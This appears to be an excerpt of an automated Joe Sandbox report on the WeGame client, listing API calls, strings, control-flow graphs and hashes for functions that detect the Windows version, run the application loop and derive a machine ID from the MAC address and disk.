                                                                control_flow_graph 1277 6bdbda53-6bdbdacf __EH_prolog3_GS memset GetVersionExW call 6bd0a8f0 1280 6bdbdadd-6bdbdae6 1277->1280 1281 6bdbdad1-6bdbdad8 1277->1281 1283 6bdbdaec-6bdbdaf4 1280->1283 1284 6bdbdb95-6bdbdb9c 1280->1284 1282 6bdbdc01 1281->1282 1289 6bdbdc03-6bdbdc08 call 6bd0a8f0 1282->1289 1287 6bdbdb02-6bdbdb04 1283->1287 1288 6bdbdaf6-6bdbdafd 1283->1288 1285 6bdbdb9e-6bdbdba6 1284->1285 1286 6bdbdbf2-6bdbdbf9 call 6bdb38e8 1284->1286 1290 6bdbdba8-6bdbdbae 1285->1290 1291 6bdbdbb0-6bdbdbb2 1285->1291 1304 6bdbdbfb-6bdbdbfc 1286->1304 1305 6bdbdc0a-6bdbdc6a call 6bd2a76f call 6bd5c8a2 * 2 call 6bd2f706 call 6bd37700 call 6bd0a3a0 call 6bd2c19d 1286->1305 1293 6bdbdb83-6bdbdb86 1287->1293 1294 6bdbdb06-6bdbdb21 _wcsnicmp 1287->1294 1288->1282 1296 6bdbdc6f-6bdbdc86 ?Is64Bit_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ call 6bd0f280 1289->1296 1290->1282 1298 6bdbdbbd-6bdbdbc0 1291->1298 1299 6bdbdbb4-6bdbdbbb 1291->1299 1293->1296 1297 6bdbdb8c-6bdbdb93 1293->1297 1301 6bdbdb2f-6bdbdb44 _wcsnicmp 1294->1301 1302 6bdbdb23-6bdbdb2a 1294->1302 1313 6bdbdc8b-6bdbdc92 call 6be22e30 1296->1313 1297->1282 1306 6bdbdbc2-6bdbdbc9 call 6bdb38e8 1298->1306 1307 6bdbdbe7-6bdbdbee call 6bdb38e8 1298->1307 1299->1282 1309 6bdbdb52-6bdbdb69 _wcsnicmp 1301->1309 1310 6bdbdb46-6bdbdb4d 1301->1310 1302->1282 1304->1282 1305->1296 1306->1304 1322 6bdbdbcb-6bdbdbd4 call 6bdb37bb 1306->1322 1307->1296 1321 6bdbdbf0 1307->1321 1315 6bdbdb6b-6bdbdb72 1309->1315 1316 6bdbdb77-6bdbdb7e 1309->1316 1310->1282 1315->1289 1316->1289 1321->1304 1330 6bdbdbde-6bdbdbe5 1322->1330 1331 6bdbdbd6-6bdbdbdc 1322->1331 1330->1289 1331->1289
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBDA5D
                                                                • memset.VCRUNTIME140(?,00000000,00000118,000001DC), ref: 6BDBDA83
                                                                • GetVersionExW.KERNEL32(0000011C), ref: 6BDBDA9C
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • ?Is64Bit_OS@Sys_wrapper@common@ierd_tgp@@SA_NXZ.COMMON(00000000,?), ref: 6BDBDC6F
                                                                  • Part of subcall function 6BD2A76F: __EH_prolog3_GS.LIBCMT ref: 6BD2A776
                                                                  • Part of subcall function 6BD2F706: __EH_prolog3_GS.LIBCMT ref: 6BD2F70D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: H_prolog3_$Bit_Is64Sys_wrapper@common@ierd_tgp@@Versionmemmovememset
                                                                • String ID: %1%.%2%$-32$-64$Server2003$Service Pack 1$Service Pack 2$Service Pack 3$Vista$Win10$Win11$Win2000$Win7$Win8$WinNT4.0$WinXP-NoSP$WinXP-SP1$WinXP-SP2$WinXP-SP3$unknown
                                                                • API String ID: 2824390341-207369704
                                                                • Opcode ID: 02860e90ba31c9336ba1ed268f19afd6daaa01efbfa9e1ea030223d11e22a81d
                                                                • Instruction ID: 5818a41d45e4287f15330f39056ccf6c543afd94be04697a9c7d2585ac81e495
                                                                • Opcode Fuzzy Hash: 02860e90ba31c9336ba1ed268f19afd6daaa01efbfa9e1ea030223d11e22a81d
                                                                • Instruction Fuzzy Hash: 505136B1E84204EADF289B648D41FDD7B74AB09B28F00009DE54ABF190DB7D9B45DB72
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD275FF Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 203sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1339 6bd275ff-6bd27615 __EH_prolog3_GS 1340 6bd27870 1339->1340 1341 6bd2761b-6bd27634 call 6bd24f63 1339->1341 1344 6bd27875-6bd27881 call 6be22e30 1340->1344 1345 6bd27636 1341->1345 1346 6bd27638-6bd27664 _Copy_construct_from ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z 1341->1346 1345->1346 1347 6bd277e6-6bd277f1 GetTickCount 1346->1347 1349 6bd277fb-6bd27804 1347->1349 1351 6bd2780a-6bd27822 call 6bd24f0e 1349->1351 1352 6bd27669-6bd27681 call 6bd2788d GetTickCount 1349->1352 1358 6bd27826-6bd27857 _Copy_construct_from ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z 1351->1358 1359 6bd27824 1351->1359 1360 6bd27683-6bd27688 GetTickCount 1352->1360 1361 6bd2768a-6bd27691 GetTickCount 1352->1361 1362 6bd27859 call 6bd1cf6f 1358->1362 1363 6bd2785e-6bd27867 1358->1363 1359->1358 1364 6bd27693-6bd276b0 GetTickCount 1360->1364 1361->1364 1362->1363 1363->1344 1368 6bd27869-6bd2786e call 6bd1cf6f 1363->1368 1365 6bd276c2-6bd276d9 GetTickCount 1364->1365 1366 6bd276b2-6bd276bd GetTickCount 1364->1366 1369 6bd276df-6bd276ea 1365->1369 1370 6bd2778d-6bd27797 1365->1370 1366->1365 1368->1344 1372 6bd276ff-6bd27708 ?get_log_instance@base@@YAPAVILogger@1@XZ 1369->1372 1373 6bd276ec-6bd276f9 ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ 1369->1373 1374 6bd277f3-6bd277f5 Sleep 1370->1374 1375 6bd27799-6bd277cb GetTickCount 1370->1375 1377 6bd2770a-6bd27717 1372->1377 1378 6bd2777b-6bd27783 1372->1378 1373->1372 1379 6bd27787 1373->1379 1374->1349 1382 6bd277d4-6bd277db GetTickCount 1375->1382 1383 6bd277cd-6bd277d2 GetTickCount 1375->1383 1377->1378 1386 6bd27719-6bd27776 call 6bd1a5ef ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ call 6bd1e945 call 6bd1b6ea 1377->1386 1378->1379 1379->1370 1385 6bd277dd-6bd277e3 1382->1385 1383->1385 1385->1347 1386->1378
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD27606
                                                                  • Part of subcall function 6BD24F63: __EH_prolog3.LIBCMT ref: 6BD24F6A
                                                                • _Copy_construct_from.LIBCPMT ref: 6BD27648
                                                                • ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,00000068), ref: 6BD27656
                                                                • GetTickCount.KERNEL32 ref: 6BD27676
                                                                • GetTickCount.KERNEL32 ref: 6BD27683
                                                                • GetTickCount.KERNEL32 ref: 6BD2768A
                                                                • GetTickCount.KERNEL32 ref: 6BD2769C
                                                                • GetTickCount.KERNEL32 ref: 6BD276B2
                                                                • GetTickCount.KERNEL32 ref: 6BD276C8
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000068), ref: 6BD276EC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000068), ref: 6BD276FF
                                                                • ?get_comp_mgr_instance@common@ierd_tgp@@YAAAVComponent_mgr@12@XZ.COMMON(00000000,00000001,e:\dailybuild_dev\wegame_client\codes\common\src\app.cpp,0000026E,6C02E7BF), ref: 6BD27739
                                                                • GetTickCount.KERNEL32 ref: 6BD277C0
                                                                • GetTickCount.KERNEL32 ref: 6BD277CD
                                                                • GetTickCount.KERNEL32 ref: 6BD277E6
                                                                • Sleep.KERNEL32(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00000068), ref: 6BD277F5
                                                                • _Copy_construct_from.LIBCPMT ref: 6BD27838
                                                                • ?post_msg@@YAXPBDV?$shared_ptr@Umsg_base@@@std@@@Z.COMMON(?,?,?,?), ref: 6BD27846
                                                                  • Part of subcall function 6BD2788D: ?stamp_point@@YAXPBD@Z.COMMON(sys_begin,?), ref: 6BD2789B
                                                                  • Part of subcall function 6BD2788D: QueryPerformanceFrequency.KERNEL32(6C0984B0,?), ref: 6BD278B3
                                                                  • Part of subcall function 6BD2788D: QueryPerformanceCounter.KERNEL32(?,?), ref: 6BD278BD
                                                                  • Part of subcall function 6BD2788D: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6BD27A15
                                                                  • Part of subcall function 6BD2788D: ?stamp_point@@YAXPBD@Z.COMMON(sys_end), ref: 6BD27A28
                                                                Strings
                                                                • true, xrefs: 6BD27750, 6BD27758
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\app.cpp, xrefs: 6BD27723
                                                                • false, xrefs: 6BD27746
                                                                • [app][Application::process]do_exit_, count:%d, will_count_:%d, can:%s, xrefs: 6BD2775F
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: CountTick$?get_comp_mgr_instance@common@ierd_tgp@@?post_msg@@?stamp_point@@Component_mgr@12@Copy_construct_fromPerformanceQueryUmsg_base@@@std@@@V?$shared_ptr@$?get_log_instance@base@@CounterFrequencyH_prolog3H_prolog3_Logger@1@MessagePeekSleep
                                                                • String ID: [app][Application::process]do_exit_, count:%d, will_count_:%d, can:%s$e:\dailybuild_dev\wegame_client\codes\common\src\app.cpp$false$true
                                                                • API String ID: 2894950961-96805165
                                                                • Opcode ID: 7aa45f0e7ae0e615ff344f4b68f9709fee2022524d2fe3fa5a226602f4df7ce9
                                                                • Instruction ID: ec4eb0a3167e4513796f680f19969cb6461e411672d1b5f6a315a8ababa65ead
                                                                • Opcode Fuzzy Hash: 7aa45f0e7ae0e615ff344f4b68f9709fee2022524d2fe3fa5a226602f4df7ce9
                                                                • Instruction Fuzzy Hash: BD817730A00244DFDB18DF78C945B6CB7F5BF4A328F154299D489AB392CB39AD01CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 6BD85F39 Relevance: 33.7, APIs: 13, Strings: 6, Instructions: 499COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1393 6bd85f39-6bd8605c __EH_prolog3_GS memset call 6bd84e28 call 6bd84034 call 6bd85904 1400 6bd86098-6bd860a4 1393->1400 1401 6bd8605e-6bd86093 call 6bd86cc1 call 6bd85e72 call 6bd0a3a0 1393->1401 1403 6bd860aa-6bd861de call 6bd152f9 call 6bd327e6 call 6bd0fc90 call 6bd327e6 call 6bd0fc90 call 6bd327e6 call 6bd37700 call 6bd0a3a0 * 6 call 6bd85e72 call 6bd0a3a0 1400->1403 1404 6bd861e3-6bd861ea 1400->1404 1401->1400 1403->1404 1406 6bd861ec-6bd861fe call 6bd85e72 1404->1406 1407 6bd86201-6bd86250 memset call 6bd851ce 1404->1407 1406->1407 1418 6bd86308-6bd8630f 1407->1418 1419 6bd86256-6bd8625d 1407->1419 1422 6bd865ab-6bd865b5 call 6bd85d3f 1418->1422 1423 6bd86315-6bd86337 call 6bd86cc1 1418->1423 1419->1418 1424 6bd86263-6bd86299 call 6bd859da 1419->1424 1437 6bd8661e-6bd86628 call 6bd858a8 1422->1437 1438 6bd865b7-6bd865c0 ?get_log_instance@base@@YAPAVILogger@1@XZ 1422->1438 1434 6bd8633d-6bd863b3 call 6bd0fa50 call 6bd0fc90 call 6bd327e6 call 6bd0fc90 call 6bd327e6 1423->1434 1435 6bd8640f-6bd86416 1423->1435 1424->1418 1436 6bd8629b-6bd862a4 ?get_log_instance@base@@YAPAVILogger@1@XZ 1424->1436 1528 6bd863b5 1434->1528 1529 6bd863b7-6bd8640a call 6bd0f830 call 6bd0a3a0 * 5 1434->1529 1446 6bd86418-6bd8643a call 6bd0fa50 1435->1446 1447 6bd8645a-6bd8649f ?Init@md5@@QAEXXZ ?Update@md5@@QAEXPAEI@Z ?Finalize@md5@@QAEXXZ 1435->1447 1442 6bd862f5-6bd86303 CloseHandle 1436->1442 1443 6bd862a6-6bd862b3 1436->1443 1456 6bd8662e-6bd86637 ?get_log_instance@base@@YAPAVILogger@1@XZ 1437->1456 1457 6bd86555-6bd86558 1437->1457 1444 6bd8651e-6bd8652e 1438->1444 1445 6bd865c6-6bd865d3 1438->1445 1448 6bd86561-6bd865a8 call 6bd0a3a0 * 4 call 6be22e30 1442->1448 1443->1442 1476 6bd862b5-6bd862f0 call 6bd1a5ef call 6bd1e945 call 6bd1b6ea 1443->1476 1444->1448 1450 6bd86530-6bd86549 call 6bd86756 1444->1450 1445->1444 1478 6bd865d9-6bd86619 call 6bd1a5ef call 6bd1e945 call 6bd1b6ea 1445->1478 1467 6bd8643c 1446->1467 1468 6bd8643e-6bd86455 call 6bd0f830 call 6bd0a3a0 1446->1468 1453 6bd864a1-6bd864b2 _memcpy_s 1447->1453 1454 6bd864b5-6bd864be ?get_log_instance@base@@YAPAVILogger@1@XZ 1447->1454 1472 6bd8654e 1450->1472 1453->1454 1461 6bd8650f-6bd86519 call 6bd0a3a0 1454->1461 1462 6bd864c0-6bd864cd 1454->1462 1470 6bd86688-6bd86691 call 6bd86bf9 1456->1470 1471 6bd86639-6bd86646 1456->1471 1457->1448 1473 6bd8655a-6bd8655b FindCloseChangeNotification 1457->1473 1461->1444 1462->1461 1493 6bd864cf-6bd8650a call 6bd1a5ef call 6bd1e945 call 6bd1b6ea 1462->1493 1467->1468 1468->1447 1487 6bd86696 1470->1487 1471->1470 1496 6bd86648-6bd86683 call 6bd1a5ef call 6bd1e945 call 6bd1b6ea 1471->1496 1472->1457 1473->1448 1476->1442 1478->1444 1487->1487 1493->1461 1496->1470 1528->1529 1529->1435
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD85F43
                                                                • memset.VCRUNTIME140(?,00000000,00000006,00000358,6BD85EF7,6C09F000,?,6BD83D93,?,00000018,6BD83E28,?,00000010), ref: 6BD85F5C
                                                                  • Part of subcall function 6BD84034: __EH_prolog3_GS.LIBCMT ref: 6BD8403E
                                                                  • Part of subcall function 6BD84034: memset.VCRUNTIME140(?,00000000,00000094,0000009C,6BD86019,?,?,?,?,?,00000000,00000006,00000358,6BD85EF7,6C09F000), ref: 6BD84061
                                                                  • Part of subcall function 6BD84034: GetVersionExA.KERNEL32(00000094), ref: 6BD8407A
                                                                  • Part of subcall function 6BD85904: memset.VCRUNTIME140(?,00000000,00000031,6C09F000,?,?), ref: 6BD85935
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,6C09F000,?,?), ref: 6BD85968
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,6C09F000,?,?), ref: 6BD85973
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,?,?,00000004,6C09F000,?,?), ref: 6BD85981
                                                                  • Part of subcall function 6BD85904: memmove.VCRUNTIME140(?,?,00000004,?,?,00000004,?,?,00000004,?,?,00000004,6C09F000,?,?), ref: 6BD8598F
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000105,?,?,00000000,?), ref: 6BD8629B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,00000105,?,?,00000000,?), ref: 6BD862F6
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                • memset.VCRUNTIME140(?,00000000,00000105), ref: 6BD86217
                                                                  • Part of subcall function 6BD86CC1: __EH_prolog3.LIBCMT ref: 6BD86CCB
                                                                  • Part of subcall function 6BD86CC1: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAVios_base@1@AAV21@@Z@Z.MSVCP140(6BD10520,00000002,00000001,000000AC,6BD86327,?,000000FF,?), ref: 6BD86CF7
                                                                  • Part of subcall function 6BD86CC1: ?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000002,00000000), ref: 6BD86D07
                                                                  • Part of subcall function 6BD86CC1: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP140(00000003), ref: 6BD86D27
                                                                  • Part of subcall function 6BD86CC1: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?), ref: 6BD86D57
                                                                  • Part of subcall function 6BD85E72: memset.VCRUNTIME140(?,00000000,?,?,6BFA8CB0,?,?,6BD861FE,?,?,00000021), ref: 6BD85E82
                                                                  • Part of subcall function 6BD85E72: ?MD5String@@YAPADPAD@Z.COMMON(?), ref: 6BD85E96
                                                                  • Part of subcall function 6BD85E72: strnlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6BD85E9F
                                                                  • Part of subcall function 6BD85E72: _memcpy_s.PGOCR ref: 6BD85EB0
                                                                  • Part of subcall function 6BD85E72: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6BD85EBE
                                                                  • Part of subcall function 6BD851CE: __EH_prolog3_GS.LIBCMT ref: 6BD851D8
                                                                  • Part of subcall function 6BD851CE: _strnset_s.API-MS-WIN-CRT-STRING-L1-1-0(00000010,00000000,00000000,-00000001,00000144,6BD8624B,000000FF,?,00000105,00000000), ref: 6BD85225
                                                                  • Part of subcall function 6BD851CE: memset.VCRUNTIME140(?,00000000,00000105), ref: 6BD85238
                                                                  • Part of subcall function 6BD851CE: SHGetFolderPathA.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BD8524F
                                                                  • Part of subcall function 6BD851CE: CreateDirectoryA.KERNEL32(?,00000000), ref: 6BD852DA
                                                                  • Part of subcall function 6BD851CE: GetLastError.KERNEL32 ref: 6BD852EA
                                                                  • Part of subcall function 6BD851CE: GetLastError.KERNEL32 ref: 6BD852F3
                                                                • ?Init@md5@@QAEXXZ.COMMON(?,000000FF), ref: 6BD86467
                                                                • ?Update@md5@@QAEXPAEI@Z.COMMON(?,?,?,000000FF), ref: 6BD8648D
                                                                • ?Finalize@md5@@QAEXXZ.COMMON(?,?,?,000000FF), ref: 6BD86498
                                                                • _memcpy_s.PGOCR ref: 6BD864AD
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,000000FF), ref: 6BD864B5
                                                                • FindCloseChangeNotification.KERNEL32(00000000,?,?,000000FF,?), ref: 6BD8655B
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config1,00000000,?,00000021,?), ref: 6BD85A69
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config2,00000000,?,00000021,?), ref: 6BD85A7D
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config3,00000000,?,00000021,?), ref: 6BD85A91
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileStringA.KERNEL32(Profile,config4,00000000,?,00000021,?), ref: 6BD85AA9
                                                                  • Part of subcall function 6BD859DA: GetPrivateProfileIntA.KERNEL32(Profile,config5,00000000,?), ref: 6BD85AB4
                                                                  • Part of subcall function 6BD859DA: _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BD85AD3
                                                                  • Part of subcall function 6BD859DA: _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6BD85AF1
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,000000FF,?), ref: 6BD865B7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,000000FF,?), ref: 6BD8662E
                                                                Strings
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC success, Get GUID from MAC & PhysicsDrive, xrefs: 6BD864F0
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid_seq_id_generator_husk.cpp, xrefs: 6BD862BF, 6BD864D9, 6BD865E3, 6BD86652
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetIDFromFile failed, GenerateID and SetIDToFile, xrefs: 6BD86669
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetCacheGuid success, return, xrefs: 6BD862D6
                                                                • [machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC failed, GetIDFromFile..., xrefs: 6BD865FA
                                                                • P, xrefs: 6BD86256
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: memset$PrivateProfile$?get_log_instance@base@@Logger@1@Stringmemmove$D@std@@@std@@H_prolog3_U?$char_traits@$??6?$basic_ostream@CloseErrorH_prolog3LastV01@_memcpy_s_stricmp$??1?$basic_ios@?setw@std@@ChangeCreateDirectoryFinalize@md5@@FindFolderH_prolog3_catch_HandleInit@md5@@J@1@_NotificationPathSmanip@_String@@U?$_Update@md5@@V21@@VersionVios_base@1@_strnset_sfreestrnlen
                                                                • String ID: P$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC failed, GetIDFromFile...$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]Get MAC success, Get GUID from MAC & PhysicsDrive$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetCacheGuid success, return$[machine_guid][CSeqIDGeneratorHusk::GetSequenceIDImp]GetIDFromFile failed, GenerateID and SetIDToFile$e:\dailybuild_dev\wegame_client\codes\common\src\machine_guid_seq_id_generator_husk.cpp
                                                                • API String ID: 4086279409-3844285129
                                                                • Opcode ID: 187adf1bf3a031a33fe087a16426542c68de105b554113a0a7dccc19a269718d
                                                                • Instruction ID: 9f8f7e2e5ac0e5bb1c3ac0adba107fc85ad507fbfd3bedb285bb7e73e6fd585f
                                                                • Opcode Fuzzy Hash: 187adf1bf3a031a33fe087a16426542c68de105b554113a0a7dccc19a269718d
                                                                • Instruction Fuzzy Hash: 3522A071C01298EADF25DBB4CC45BDEBBB8AF16318F1440D9D149AB181EB785B88CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 00463E09 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 259COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 00463E13
                                                                  • Part of subcall function 0045907A: __EH_prolog3.LIBCMT ref: 00459081
                                                                  • Part of subcall function 00420E50: memmove.VCRUNTIME140(00000000,00000000,00000000,00420411,00000000,00000000,00000000,?,00423F52,00000000,00000001), ref: 00420E77
                                                                • ?get_cfg_by_path@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_ptree@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V12@U?$less@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@property_tree@boost@@_N@Z.COMMON(?,?,00000000,log,00000003,?,?,?,000000C0,00463C2D,00000000,00459F4F), ref: 00463E62
                                                                • ?get_exe_path_ex@Application@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,log), ref: 00463E8D
                                                                • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?,log), ref: 00463EA0
                                                                  • Part of subcall function 0045CBE9: __EH_prolog3_GS.LIBCMT ref: 0045CBF0
                                                                  • Part of subcall function 0045CBE9: ??_0path@filesystem@ierd_tgp@@QAEAAV012@ABV012@@Z.COMMON(?,00000024,00463EB7,?,00000000,?,?,log), ref: 0045CC20
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • ?IsSubWegameProcess@util_multi_instance@ierd_tgp@@YA_NXZ.COMMON(?,?,log), ref: 00463EE4
                                                                • ?GetWegameProcessCount@util_multi_instance@ierd_tgp@@YAHXZ.COMMON(?,?,log), ref: 00463EF1
                                                                  • Part of subcall function 0046C021: __EH_prolog3.LIBCMT ref: 0046C028
                                                                  • Part of subcall function 0045162B: __EH_prolog3.LIBCMT ref: 00451632
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,log), ref: 00464070
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000000,?,00000000,00000000,?,00000001,06400000,00000000,00000150), ref: 004640A0
                                                                • ?is_static_detail_log@common@ierd_tgp@@YA_NXZ.COMMON(?,?,?,?,?,?,?,?,?,?,00463C2D,00000000,00459F4F), ref: 004640AE
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000003.00000002.3337056625.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337123935.000000000047D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337148162.00000000004A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337161820.00000000004A5000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337176233.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                • Associated: 00000003.00000002.3337189589.00000000004AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
